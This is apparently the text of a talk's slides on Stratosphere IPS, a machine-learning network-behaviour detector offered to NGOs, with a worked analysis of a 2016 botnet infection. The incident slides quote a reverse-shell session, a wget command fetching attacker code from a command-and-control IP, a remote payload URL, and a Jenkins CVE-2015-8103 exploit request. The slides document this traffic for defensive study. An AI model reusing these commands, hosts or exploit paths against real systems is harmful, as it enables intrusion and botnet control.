Machine Learning, Security and the Stratosphere Project

Sebastian Garcia - CTU University, Prague

@eldracote

sebastian.garcia@agents.fel.cvut.cz

https://stratosphereips.org

Stratosphere IPS

https://stratosphereips.org/

Free

Software

Machine

Learning

Behavioral

IPS

Protecting

NGOs

Stratosphere Goals

• To put machine learning techniques in the hands of the civil society.

• To offer this detection service to NGOs for free.

• To focus on what computers are doing, not the attacks they receive.

Stratosphere Tech Principles

• Less is More

  • Analyze the behavior of groups of flows.

• Disassociate

  • Representation of behavior from detection.

• Verify

  • With real and labeled datasets.

About Behaviors

• Your behavior is usually the same when connecting with the same service.

• Group flows going to a specific service by ignoring the source port. We call it a connection.

• The connection, composed of several flows, now shows a behavior in time.

Network Behaviors

• Model network behaviors as a string of letters.

• 1 flow        3 features         1 letter

Malware Behaviors

• Malware mostly generate the same behaviors.

• Changing the behavior is costly for the attacker.

• These behaviors do not expire quickly.

• Malware Open Data

  • https://stratosphereips.org/category/dataset.html

Behavior of Connections

Markov Chains Models

• Create, train and store a Markov Chain models

Behavioral Detection

Trained

Markov Models

Similarity to Unknown Traffic

Real Detection Example

Example Detection

• January 18th, 2016.

• Got an alert from a malicious behavior.

147.32.xx.xx-23.247.5.27-25000-tcp [Global Frag Networks,US]: 88,H,H,h,H,H,h,h,h,h,h,H,h,H,H,H,H,H,H,H,H,H,H,H,H,H,h,h,h,h,H,

"For a long time there was a periodic connection (freq 5s-60s), to an uncommon port, with large flows of medium duration."

The Detected Connection

Sent: "+.............P.43.249.81.135.......?."
Recv once:  "import time as O000OO0O0O00OO00O"

• 43.249.81.135

  • No VirusTotal detection.

  • AS58879 Shanghai Anchang Network Security Technology Co.,L. China.

  • Last known domain: lyzqmir2.com. Minecraft server.

The Beginning

• 103.242.134.118 port 33333/TCP [VT:7]​

  • S:"/bin/sh: 0: can't access tty; job control turned off.$,"

  • S:"tomcat6 17547 0.0 0.0 7944 868 ? S 13:36 0:00 grep abcc.$

  • S:"wget 23.247.5.27:435/abcc.c"

• 23.247.5.27 port 25000/TCP (main CC)

  • "=...-== Love AV ==-:..Linux 3.2.0-4-amd64"

• Python Script (Deobfuscated by Veronica Valeros Thx!)

  • "http://222.179.116.23:8080/theme/1/pys.py"

Is it Attacking?

• Hundreds of connections to IPs in China, port 80/UDP.

• 115.239.248.88 port 80/UDP [MoveInternet Network Technology Co.,Ltd.,CN]

  • Few Kb of binary data sent.

  • No apparent explanation.

The Attack Conclusion

• Strange POSTs to Jenkins minutes before

  • POST /jenkins/descriptor/hudson.model.DownloadService/...

• Remote Jenkins code execution vulnerability CVE-2015-8103. Metasploit module.

• C&C channel with 10s timeouts.

• ​Receives orders and executes OS commands

• Function to send random UDP data to IPs.

• Similar to BillGates botnet, not quite.

Stratosphere Data Analysis

• Cloud-based detection service for NGOs.

• Add new algorithms continually.

• Update the models.

• Verify the detections if necessary.

• We sign NDAs, NGOs can send the Flows or only the letters! Privacy matters.

New Algorithms

• Anomaly Detection

  • New feature in behavioral letters.

• Malicious HTTPs detection.

• Graph Analysis of sequential connections.

• WHOIS similarity grouping.

• P2P behavior

• Behavioral Patterns of the Host.

Example of Graph Analysis

Organizations working with us

• People In Need. CZ. Helping 22 countries. Human-rights, war, etc.

• CZ.NIC. Manager of .cz and Turris Project. 2,000 Internet Networks.

• ICT help for policy makers in 20 African Countries

• CTU University. With more than 7,000 hosts.

Questions? And Thanks!